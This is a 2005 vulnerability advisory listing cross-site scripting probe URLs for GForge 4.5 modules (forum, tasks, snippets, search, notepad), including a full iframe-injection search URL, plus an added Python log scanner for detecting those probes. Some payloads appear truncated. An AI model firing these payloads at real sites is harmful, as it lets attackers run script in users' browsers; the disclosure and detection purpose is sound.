---------------------------------------------------------------------------
Various Vulnerabilities in GForge
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GForge - 4.5 (Current)

GForge has tools to help your team collaborate, like message forums and
mailing lists; tools to create and control access to Source Code Management
repositories like CVS and Subversion. GForge automatically creates a
repository and controls access to it depending on the role settings of the
project.

Web : http://gforge.org/

---------------------------------------------------------------------------

A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.- In the Forum Module:

http://[target]/forum/forum.php?forum_id=">
http://[target]/forum/forum.php?group_id=">

(NOTE: The group_id parameter is ALWAYS vulnerable.)

2.- In the Task Module:

http://[target]/pm/task.php?func=detailtask&project_task_id=">hi!&group_id=1&group_project_id=3

3.- In the Snippets Module:

http://[target]/snippet/detail.php?type=snippet&id=21">

hi!!!

in the search field and press enter or try the following URL:

http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%3E&Search=Search

5.- In other modules:

http://[target]//frs/admin/qrs.php?group_id=">
http://[target]/notepad.php?form=parent;%0d%0a-->%0d%0a

hi!
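
Added example (not part of the original advisory and not GForge code): a Python sketch that scans web-server access logs for requests in which the parameters listed above carry non-numeric IDs or markup characters. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Endpoints and numeric-ID parameters listed in the advisory.
ID_PARAMS = {
    "/forum/forum.php": {"forum_id"},
    "/pm/task.php": {"project_task_id", "group_project_id"},
    "/snippet/detail.php": {"id"},
}
# Free-text parameters listed in the advisory.
TEXT_PARAMS = {"/search/": {"words"}, "/notepad.php": {"form"}}
MARKUP = re.compile(r'[<>"\r\n]')
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return sorted (path, parameter) pairs in one log line that look like probes."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    raw_path, _, query = match.group(1).partition("?")
    path = re.sub(r"/+", "/", raw_path)  # normalises the advisory's "//frs/..." form
    hits = set()
    for name, value in parse_qsl(query, keep_blank_values=True, separator="&"):
        # group_id is checked on every path: the advisory says it is always vulnerable.
        if name == "group_id" or name in ID_PARAMS.get(path, ()):
            if not (value.isascii() and value.isdigit()):
                hits.add((path, name))
        elif name in TEXT_PARAMS.get(path, ()) and MARKUP.search(value):
            hits.add((path, name))
    return sorted(hits)

def scan(lines):
    """Return {line_number: hits} for the lines that contain at least one hit."""
    results = ((n, suspicious_params(line)) for n, line in enumerate(lines, 1))
    return {n: hits for n, hits in results if hits}

# Constructed sample log lines (combined log format assumed).
LINE = '192.0.2.7 - - [01/Jan/2005:10:00:00 +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE_LOG = [LINE % target for target in (
    "/forum/forum.php?forum_id=7&group_id=1",
    "/forum/forum.php?forum_id=%22%3E%3Cb%3Ex&group_id=1",
    "//frs/admin/qrs.php?group_id=%22%3E",
    "/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi&Search=Search",
    "/search/?type_of_search=soft&words=gforge+plugin&Search=Search",
    "/notepad.php?form=parent;%0d%0a--%3E",
)]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```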